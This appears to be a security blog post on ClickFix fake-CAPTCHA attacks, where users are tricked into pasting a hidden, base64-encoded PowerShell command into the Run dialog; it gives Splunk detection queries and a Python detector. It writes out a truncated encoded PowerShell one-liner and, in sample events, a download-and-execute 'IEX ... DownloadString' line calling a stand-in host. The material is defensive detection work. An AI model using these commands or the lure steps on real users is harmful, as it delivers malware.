
Unveiling Fake CAPTCHA ClickFix Attacks

Analysis of the ClickFix social engineering technique where fake CAPTCHAs trick users into executing malicious PowerShell commands via clipboard hijacking.

clickfix social-engineering phishing powershell detection splunk

Originally published on the Splunk Security Blog
Read the full article: Unveiling Fake CAPTCHA ClickFix Attacks

The Deceptively Simple Attack

ClickFix is brilliantly evil. It combines social engineering with clipboard manipulation to trick users into executing malicious commands themselves.

How It Works

  1. User visits malicious site - Often via malvertising or phishing
  2. Fake CAPTCHA appears - “Verify you’re human”; clicking the checkbox runs page JavaScript that silently writes a command to the clipboard
  3. Instructions displayed - “Press Win+R, then Ctrl+V, then Enter”
  4. Malicious payload executes - User unknowingly pastes and runs attacker’s code from the Run dialog

The genius? The user voluntarily runs the command. No browser exploit, and no file is downloaded, so there is no Mark-of-the-Web or SmartScreen prompt to get past.

What’s on the Clipboard?

Typically a PowerShell one-liner with a hidden window and the real command base64-encoded (UTF-16LE, which is what -EncodedCommand expects):

powershell -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8A...

This downloads and executes the real payload—info stealers, RATs, or ransomware loaders.

Detection Strategies

Clipboard-to-PowerShell Pattern

index=sysmon EventCode=1
  Image="*\\powershell.exe"
  ParentImage="*\\explorer.exe"
  (CommandLine="*-e*" OR CommandLine="*-enc*")
| regex CommandLine="(?i)(^|\s)[-/](e|ec|en|enc|encodedcommand)\s"
| table _time, Computer, User, CommandLine

The wildcard clause is a cheap pre-filter but also matches -ExecutionPolicy and -ep; the regex step keeps only the encoded-command switch. PowerShell accepts any prefix of -EncodedCommand (plus -ec), so -e, -en and -enc are all the same switch. Replace index=sysmon with wherever your Sysmon Event ID 1 data lands.

Run Dialog Spawning PowerShell

| tstats summariesonly=true count min(_time) AS firstTime max(_time) AS lastTime
  FROM datamodel=Endpoint.Processes
  WHERE Processes.parent_process_name="explorer.exe"
  AND Processes.process_name="powershell.exe"
  BY Processes.dest Processes.user Processes.process
| `drop_dm_object_name(Processes)`

On its own this fires for every user who opens PowerShell from the Start menu or a shortcut, since explorer.exe is the parent there too. Treat it as a hunting baseline and narrow on Processes.process for the hidden-window and encoded-command switches.
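The following is an added example, not code from the original post or from ClickGrab. It implements the two detections above in Python over constructed Sysmon Event ID 1 records (field names Image, ParentImage, CommandLine, User, Computer are Sysmon's; hostnames, users and the example.invalid URL are made up), and decodes the clipboard payload the way -EncodedCommand does: base64 over UTF-16LE text. It goes beyond the wildcard queries in one respect: it normalises PowerShell's switch abbreviations, so -w hidden -e and -WindowStyle Hidden -EncodedCommand are treated as the same pattern, while -ExecutionPolicy from a desktop shortcut is not flagged.

```python
"""ClickFix Run-dialog detection over Sysmon Event ID 1 records.

Added example, not code from the original post or from ClickGrab. The
records in SAMPLE_EVENTS are constructed to look like Sysmon process
creation events; hosts, users and URLs are invented.
"""
import base64
import binascii
from typing import Optional


def encode_ps(command: str) -> str:
    """Build the argument powershell.exe expects after -EncodedCommand.

    powershell.exe decodes -e/-enc as base64 of UTF-16LE text, not UTF-8;
    decoding the blob as UTF-8 yields interleaved NUL bytes.
    """
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_ps(blob: str) -> Optional[str]:
    """Inverse of encode_ps; None if the blob is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def _switch_matches(arg: str, full: str, minimum: str) -> bool:
    """powershell.exe accepts any prefix of a parameter name at least as long
    as its documented short form, with either - or / as the switch char, so
    -e, -en, -enc and -EncodedCommand are one switch. A literal match on the
    string "-e" misses most of them and also hits -ExecutionPolicy."""
    if not arg.startswith(("-", "/")):
        return False
    key = arg[1:].lower()
    return len(key) >= len(minimum) and full.startswith(key)


def inspect_powershell_args(cmdline: str) -> dict:
    """Extract the two ClickFix tells: a hidden window and an encoded command."""
    argv = cmdline.split()  # switches and base64 never contain whitespace
    hidden, encoded, i = False, None, 0
    while i < len(argv):
        arg = argv[i]
        nxt = argv[i + 1] if i + 1 < len(argv) else ""
        if _switch_matches(arg, "windowstyle", "w"):
            hidden = nxt.lower() in ("hidden", "1")  # ProcessWindowStyle.Hidden == 1
            i += 1  # consume the value
        elif _switch_matches(arg, "encodedcommand", "e") or _switch_matches(arg, "ec", "ec"):
            encoded = nxt
            i += 1
        i += 1
    return {"hidden_window": hidden, "encoded_blob": encoded}


def detect_clickfix(events: list) -> list:
    """Flag PowerShell spawned by explorer.exe (the Win+R path) that runs an
    encoded command, and decode the payload for the analyst. explorer.exe is
    also the parent for Start-menu launches, so the encoded switch is what
    turns a noisy baseline into an alert."""
    alerts = []
    for ev in events:
        image = ev["Image"].rsplit("\\", 1)[-1].lower()
        parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
        if image not in ("powershell.exe", "pwsh.exe") or parent != "explorer.exe":
            continue
        tells = inspect_powershell_args(ev["CommandLine"])
        if tells["encoded_blob"] is None:
            continue  # e.g. -ExecutionPolicy Bypass -File ... from a shortcut
        alerts.append({
            "host": ev["Computer"],
            "user": ev["User"],
            "hidden_window": tells["hidden_window"],
            "decoded": decode_ps(tells["encoded_blob"]),
        })
    return alerts


# Constructed second-stage command; the URL is a reserved example domain.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [  # constructed Sysmon Event ID 1 records
    {"Computer": "WS01", "User": "CORP\\alice", "Image": _PS,
     "ParentImage": r"C:\Windows\explorer.exe",  # pasted into Win+R, short switches
     "CommandLine": f"powershell -w hidden -e {encode_ps(STAGE2)}"},
    {"Computer": "WS02", "User": "CORP\\bob", "Image": _PS,
     "ParentImage": r"C:\Windows\explorer.exe",  # same thing, switches spelled out
     "CommandLine": f"powershell.exe -WindowStyle Hidden -EncodedCommand {encode_ps(STAGE2)}"},
    {"Computer": "WS03", "User": "CORP\\carol", "Image": _PS,
     "ParentImage": r"C:\Windows\explorer.exe",  # admin shortcut: matches "*-e*" but benign
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"Computer": "WS04", "User": "CORP\\dave", "Image": _PS,
     "ParentImage": r"C:\Windows\System32\cmd.exe",  # encoded, but not the Run-dialog path
     "CommandLine": f"powershell -enc {encode_ps('Get-Date')}"},
]

if __name__ == "__main__":
    for alert in detect_clickfix(SAMPLE_EVENTS):
        print(alert)
```

Only the first two records produce alerts; the decoded field shows the analyst the stage-2 downloader in clear text without having to reproduce the UTF-16LE decode by hand. The fourth record is left to a separate hunt on encoded PowerShell from any parent, which is a different and noisier question than the Run-dialog pattern this page describes.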

ClickGrab Tool

I built ClickGrab to help defenders test and detect these attacks safely.

Related Modules

ClickGrab (active): Finding ClickFix and FakeCAPTCHA like it's 1999. Detection and hunting tools for clipboard hijacking attacks.